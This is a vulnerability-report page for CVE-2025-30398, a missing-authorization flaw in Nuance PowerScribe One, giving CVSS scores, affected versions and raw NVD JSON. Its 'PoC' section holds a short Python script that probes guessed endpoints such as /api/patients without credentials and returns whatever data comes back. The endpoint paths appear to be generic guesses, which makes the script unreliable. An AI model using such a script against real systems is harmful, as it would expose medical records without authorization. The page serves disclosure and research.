Security Vulnerability Report
中文
CVE-2025-30398 CVSS 8.1 HIGH

CVE-2025-30398

Published: 2025-11-11 18:15:35
Last Modified: 2026-02-12 17:20:07
Source: [email protected]

Description

Missing authorization in Nuance PowerScribe allows an unauthorized attacker to disclose information over a network.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.7:*:*:*:*:*:*:* - VULNERABLE
Nuance PowerScribe 报告管理系统(具体版本待官方确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-30398 PoC - Nuance PowerScribe Authorization Bypass # Target: Nuance PowerScribe vulnerable endpoint TARGET_HOST = "https://vulnerable-powerscribe-server.com" def check_vulnerability(): """ Check if the target Nuance PowerScribe installation is vulnerable to CVE-2025-30398 (Missing Authorization) """ # Attempt to access sensitive endpoint without authentication sensitive_endpoints = [ "/api/reports", "/api/patients", "/api/studies", "/api/radiologists", "/api/reports/pending" ] for endpoint in sensitive_endpoints: url = f"{TARGET_HOST}{endpoint}" try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if we can access the endpoint without authorization if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint} accessible without auth") print(f" Status: {response.status_code}") print(f" Content-Length: {len(response.content)}") return True elif response.status_code == 401: print(f"[-] Protected: {endpoint} requires auth") else: print(f"[*] Endpoint: {endpoint} returned {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") return False def exploit_information_disclosure(endpoint): """ Exploit CVE-2025-30398 to extract sensitive information """ url = f"{TARGET_HOST}{endpoint}" response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: # Parse and return sensitive data return response.json() return None if __name__ == "__main__": print("CVE-2025-30398 - Nuance PowerScribe Authorization Bypass PoC") print("=" * 60) if check_vulnerability(): print("\n[!] Target appears to be vulnerable to CVE-2025-30398") print("[!] Immediate patching recommended") else: print("\n[+] Target does not appear to be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30398", "sourceIdentifier": "[email protected]", "published": "2025-11-11T18:15:35.107", "lastModified": "2026-02-12T17:20:07.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing authorization in Nuance PowerScribe allows an unauthorized attacker to disclose information over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "8ED622CE-D7FD-4B2D-BC99-168D521B3FD4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "E9F234B2-C4BA-44DD-A128-6BFF4576F7AB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "147DD7CE-53EC-42C7-A966-06015CB6F07E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "C1D336CD-A318-45CD-BDC1-1C0BE9D7A161"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "1A881533-9A47-4A01-B9F6-841E656DBC33"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "000EECC0-C95A-4D81-BDA8-5166F9B04F02"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:4.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "C180424A-9E0B-432D-8192-BBA1ADA5EE8F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.1:*:*:*:*:*:*:*", "matchCriteriaId": "62329468-E85C-4A3C-A0BF-8BA11941DED5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.2:*:*:*:*:*:*:*", "matchCriteriaId": "3EDC600D-8637-4BAB-AC7D-A9D95B03DAB9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.3:*:*:*:*:*:*:*", "matchCriteriaId": "47AC5A9D-8016-4BDB-9D8F-098CFD93855A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B6B794A-C467-411D-9468-A7ADDA7D6157"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.5:*:*:*:*:*:*:*", "matchCriteriaId": "870B35F1-75F2-4EBB-A4C5-F6C3118BBC25"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.6:*:*:*:*:*:*:*", "matchCriteriaId": "548FC39C-8C08-4285-A5FC-0785738C4471"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.7:*:*:*:*:*:*:*", "matchCriteriaId": "4F44CAAE-A020-4F81-BF96-48F9D6559A7D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.8:*:*:*:*:*:*:*", "matchCriteriaId": "EA71CDB3-269C-4EE8-9F46-FD7CC1284B9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.9:*:*:*:*:*:*:*", "matchCriteriaId": "F374C80B-0336-4687-879B-1745234B9E37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2019.10:*:*:*:*:*:*:*", "matchCriteriaId": "682143B4-04BA-4C11-AAE8-E687B6BE4688"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:nuance_powerscribe_one:2023.1:sp2_patch_7:*:*:*:*:*:*", "matchCriteriaId": "AA5407C0-0336-4055-BD18-EA68C7C40218"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30398", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.